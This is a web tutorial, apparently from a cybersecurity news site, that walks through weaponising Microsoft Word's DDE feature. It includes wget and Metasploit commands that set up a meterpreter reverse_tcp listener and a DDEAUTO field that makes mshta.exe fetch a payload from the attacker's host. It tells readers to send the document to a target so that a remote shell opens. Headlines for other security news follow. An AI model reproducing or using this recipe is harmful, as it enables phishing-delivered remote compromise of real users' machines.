DDE exploit also known as dynamic data exchange, allows data to be transferred between applications without any interaction from the user. Hackers leveraged this method to execute malicious scripts to compromise.
It was reported to Microsoft from Sensepost, Etienne Stalmans, and Saif El-Sherei but it was not patched since many applications are using the DDE protocol. This exploit doesn’t require a macro function to be enabled.
Also Read Complete list of Kali Linux Tutorials
We will have to import a Metasploit exploit.
Download it from GitHub by using the command terminal
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
Move the script to the Metasploit location
mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
Now type msfconsole in the terminal, which launches the Metasploit framework and type reload_all to load the modules.
This exploit uses the dde function to deliver the hta payload. Now type in
use exploit/windows/dde_delivery
then set the sever host using the following command
set SRVHOST 192.168.177.141
we need to set a payload listener. Don’t use port 8080 since the server port is set by default to 8080
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.177.141
- set LPORT 6708
- exploit
Now copy and paste the code into any Word document. we used Office 365 pro plus, fully updated. locate formula and you should have a small error box in the doc and then right-click toggle code. paste the command in the doc between flower brackets. save the document.
{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}
Send the document to the suspect and a meterpreter session will open. Take a look at the video
You can follow us on Linkedin, Twitter, and Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep yourself self-updated.
A recent security vulnerability in a widely used airline integration service has exposed millions of…
In a groundbreaking cybersecurity investigation, researchers identified several critical vulnerabilities in a target system, eventually…
A critical vulnerability in the Cacti performance monitoring framework tracked as CVE-2025-22604, has been disclosed,…
Cisco Talos researchers have identified an ongoing cyber campaign, active since mid-2024, deploying a previously…
A groundbreaking technique for exploiting Windows systems has emerged, combining the "Bring Your Own Vulnerable…
Microsoft has taken a significant step toward enhancing cybersecurity by introducing a new phishing attack…